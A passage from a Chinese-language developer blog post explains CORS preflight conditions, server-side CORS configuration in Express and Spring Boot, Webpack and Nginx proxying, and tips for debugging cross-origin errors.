<h3 id="3-2-触发预检的条件"><a href="#3-2-触发预检的条件" class="headerlink" title="3.2 触发预检的条件"></a>3.2 触发预检的条件</h3><h4 id="简单请求（不触发预检）"><a href="#简单请求（不触发预检）" class="headerlink" title="简单请求（不触发预检）"></a>简单请求（不触发预检）</h4><p>满足以下所有条件的请求为简单请求：</p>
<p><strong>允许的方法：</strong></p>
<ul>
<li>GET</li>
<li>HEAD  </li>
<li>POST</li>
</ul>
<p><strong>允许的Content-Type：</strong></p>
<ul>
<li>application&#x2F;x-www-form-urlencoded</li>
<li>multipart&#x2F;form-data</li>
<li>text&#x2F;plain</li>
</ul>
<p><strong>允许的请求头：</strong></p>
<ul>
<li>Accept</li>
<li>Accept-Language</li>
<li>Content-Language</li>
<li>Content-Type（仅限上述三种值）</li>
</ul>
<h4 id="复杂请求（触发预检）"><a href="#复杂请求（触发预检）" class="headerlink" title="复杂请求（触发预检）"></a>复杂请求（触发预检）</h4><p>不满足简单请求条件的都会触发预检，包括：</p>
<p><strong>HTTP方法：</strong></p>
<ul>
<li>PUT</li>
<li>DELETE</li>
<li>PATCH</li>
<li>CONNECT</li>
<li>OPTIONS</li>
<li>TRACE</li>
<li>以及其他自定义方法</li>
</ul>
<p><strong>Content-Type：</strong></p>
<ul>
<li>application&#x2F;json</li>
<li>application&#x2F;xml</li>
<li>text&#x2F;xml</li>
<li>等其他类型</li>
</ul>
<p><strong>自定义请求头：</strong></p>
<ul>
<li>Authorization</li>
<li>X-Requested-With</li>
<li>任何自定义头部（如X-Custom-Header）</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 简单请求示例 - 不触发预检</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com/data&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">method</span>: <span class="string">&#x27;GET&#x27;</span></span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com/form&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">  <span class="attr">headers</span>: &#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span></span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="attr">body</span>: <span class="string">&#x27;name=John&amp;age=30&#x27;</span></span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 复杂请求示例 - 触发预检</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com/user&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">method</span>: <span class="string">&#x27;PUT&#x27;</span>,  <span class="comment">// 非简单方法</span></span><br><span class="line">  <span class="attr">headers</span>: &#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span>  <span class="comment">// 非简单Content-Type</span></span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="attr">body</span>: <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123;<span class="attr">name</span>: <span class="string">&#x27;John&#x27;</span>&#125;)</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com/data&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">method</span>: <span class="string">&#x27;GET&#x27;</span>,</span><br><span class="line">  <span class="attr">headers</span>: &#123;</span><br><span class="line">    <span class="string">&#x27;Authorization&#x27;</span>: <span class="string">&#x27;Bearer token&#x27;</span>  <span class="comment">// 自定义头部</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<h2 id="4-跨域解决方案"><a href="#4-跨域解决方案" class="headerlink" title="4. 跨域解决方案"></a>4. 跨域解决方案</h2><h3 id="4-1-服务端配置CORS"><a href="#4-1-服务端配置CORS" class="headerlink" title="4.1 服务端配置CORS"></a>4.1 服务端配置CORS</h3><h4 id="Node-js-Express示例"><a href="#Node-js-Express示例" class="headerlink" title="Node.js + Express示例"></a>Node.js + Express示例</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin&#x27;</span>, <span class="string">&#x27;*&#x27;</span>);</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods&#x27;</span>, <span class="string">&#x27;GET, POST, PUT, DELETE, OPTIONS&#x27;</span>);</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Headers&#x27;</span>, <span class="string">&#x27;Content-Type, Authorization&#x27;</span>);</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">if</span> (req.<span class="property">method</span> === <span class="string">&#x27;OPTIONS&#x27;</span>) &#123;</span><br><span class="line">    res.<span class="title function_">sendStatus</span>(<span class="number">200</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_">next</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<h4 id="Spring-Boot示例"><a href="#Spring-Boot示例" class="headerlink" title="Spring Boot示例"></a>Spring Boot示例</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@CrossOrigin(origins = &quot;https://www.example.com&quot;)</span></span><br><span class="line"><span class="meta">@RestController</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ApiController</span> &#123;</span><br><span class="line">    <span class="comment">// 控制器方法</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="4-2-代理解决方案"><a href="#4-2-代理解决方案" class="headerlink" title="4.2 代理解决方案"></a>4.2 代理解决方案</h3><h4 id="开发环境-Webpack-DevServer"><a href="#开发环境-Webpack-DevServer" class="headerlink" title="开发环境 - Webpack DevServer"></a>开发环境 - Webpack DevServer</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// webpack.config.js</span></span><br><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123;</span><br><span class="line">  <span class="attr">devServer</span>: &#123;</span><br><span class="line">    <span class="attr">proxy</span>: &#123;</span><br><span class="line">      <span class="string">&#x27;/api&#x27;</span>: &#123;</span><br><span class="line">        <span class="attr">target</span>: <span class="string">&#x27;https://api.example.com&#x27;</span>,</span><br><span class="line">        <span class="attr">changeOrigin</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="attr">pathRewrite</span>: &#123;</span><br><span class="line">          <span class="string">&#x27;^/api&#x27;</span>: <span class="string">&#x27;&#x27;</span></span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h4 id="生产环境-Nginx反向代理"><a href="#生产环境-Nginx反向代理" class="headerlink" title="生产环境 - Nginx反向代理"></a>生产环境 - Nginx反向代理</h4><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">server</span> &#123;</span><br><span class="line">    <span class="attribute">listen</span> <span class="number">80</span>;</span><br><span class="line">    <span class="attribute">server_name</span> www.example.com;</span><br><span class="line">    </span><br><span class="line">    <span class="section">location</span> /api/ &#123;</span><br><span class="line">        <span class="attribute">proxy_pass</span> https://api.backend.com/;</span><br><span class="line">        <span class="attribute">proxy_set_header</span> Host <span class="variable">$host</span>;</span><br><span class="line">        <span class="attribute">proxy_set_header</span> X-Real-IP <span class="variable">$remote_addr</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="5-最佳实践和安全建议"><a href="#5-最佳实践和安全建议" class="headerlink" title="5. 最佳实践和安全建议"></a>5. 最佳实践和安全建议</h2><h3 id="5-1-生产环境配置"><a href="#5-1-生产环境配置" class="headerlink" title="5.1 生产环境配置"></a>5.1 生产环境配置</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 不要使用通配符</span></span><br><span class="line">res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin&#x27;</span>, <span class="string">&#x27;https://trusted-domain.com&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 明确指定允许的方法和头部</span></span><br><span class="line">res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods&#x27;</span>, <span class="string">&#x27;GET, POST&#x27;</span>);</span><br><span class="line">res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Headers&#x27;</span>, <span class="string">&#x27;Content-Type&#x27;</span>);</span><br></pre></td></tr></table></figure>

<h3 id="5-2-前端处理跨域错误"><a href="#5-2-前端处理跨域错误" class="headerlink" title="5.2 前端处理跨域错误"></a>5.2 前端处理跨域错误</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com/data&#x27;</span>)</span><br><span class="line">  .<span class="title function_">then</span>(<span class="function"><span class="params">response</span> =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!response.<span class="property">ok</span>) &#123;</span><br><span class="line">      <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">Error</span>(<span class="string">`HTTP error! status: <span class="subst">$&#123;response.status&#125;</span>`</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> response.<span class="title function_">json</span>();</span><br><span class="line">  &#125;)</span><br><span class="line">  .<span class="title function_">catch</span>(<span class="function"><span class="params">error</span> =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (error.<span class="property">message</span>.<span class="title function_">includes</span>(<span class="string">&#x27;CORS&#x27;</span>)) &#123;</span><br><span class="line">      <span class="variable language_">console</span>.<span class="title function_">error</span>(<span class="string">&#x27;跨域请求被阻止:&#x27;</span>, error);</span><br><span class="line">      <span class="comment">// 提示用户或使用备用方案</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;);</span><br></pre></td></tr></table></figure>

<h2 id="6-调试跨域问题的方法"><a href="#6-调试跨域问题的方法" class="headerlink" title="6. 调试跨域问题的方法"></a>6. 调试跨域问题的方法</h2><h3 id="6-1-浏览器开发者工具"><a href="#6-1-浏览器开发者工具" class="headerlink" title="6.1 浏览器开发者工具"></a>6.1 浏览器开发者工具</h3><ul>
<li>查看Network面板的OPTIONS请求</li>
<li>检查Response Headers中的CORS相关字段</li>
<li>查看Console中的错误信息</li>
</ul>
<h3 id="6-2-常用调试技巧"><a href="#6-2-常用调试技巧" class="headerlink" title="6.2 常用调试技巧"></a>6.2 常用调试技巧</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 检查请求是否为简单请求</span></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">isSimpleRequest</span> = (<span class="params">method, headers</span>) =&gt; &#123;</span><br><span class="line">  <span class="keyword">const</span> simpleMethods = [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;HEAD&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>];</span><br><span class="line">  <span class="keyword">const</span> simpleHeaders = [<span class="string">&#x27;accept&#x27;</span>, <span class="string">&#x27;accept-language&#x27;</span>, <span class="string">&#x27;content-language&#x27;</span>, <span class="string">&#x27;content-type&#x27;</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">return</span> simpleMethods.<span class="title function_">includes</span>(method) &amp;&amp; </span><br><span class="line">         <span class="title class_">Object</span>.<span class="title function_">keys</span>(headers).<span class="title function_">every</span>(<span class="function"><span class="params">h</span> =&gt;</span> simpleHeaders.<span class="title function_">includes</span>(h.<span class="title function_">toLowerCase</span>()));</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h2 id="7-总结"><a href="#7-总结" class="headerlink" title="7. 总结"></a>7. 总结</h2><p>跨域问题是前端开发中的常见挑战，理解其原理有助于我们选择合适的解决方案：</p>
<ol>
<li><strong>开发阶段</strong>：使用代理服务器</li>
<li><strong>生产环境</strong>：服务端正确配置CORS</li>
<li><strong>安全第一</strong>：避免使用通配符，明确指定允许的源</li>
</ol>
<p>记住，跨域限制是浏览器的安全机制，我们应该在保证安全的前提下解决跨域问题。</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CORS">MDN - CORS</a></li>
<li><a target="_blank" rel="noopener" href="https://tools.ietf.org/html/rfc6454">RFC 6454 - The Web Origin Concept</a></li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/shaoliang123456/tags/%E5%89%8D%E7%AB%AF/" rel="tag"># 前端</a>
              <a href="/shaoliang123456/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
              <a href="/shaoliang123456/tags/CORS/" rel="tag"># CORS</a>
              <a href="/shaoliang123456/tags/%E8%B7%A8%E5%9F%9F/" rel="tag"># 跨域</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/shaoliang123456/2025/09/01/SpringBlade%E5%BE%AE%E6%9C%8D%E5%8A%A1%E9%A1%B9%E7%9B%AE%E5%AD%A6%E4%B9%A0/" rel="prev" title="Java项目改造成NextJs+React(一)">
                  <i class="fa fa-angle-left"></i> Java项目改造成NextJs+React(一)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/shaoliang123456/2025/09/01/%E6%97%A5%E5%BF%97-%E5%AE%B9%E6%98%93%E8%B8%A9%E7%9A%84%E5%9D%91/" rel="next" title="日志-容易踩的坑">
                  日志-容易踩的坑 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Leon</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
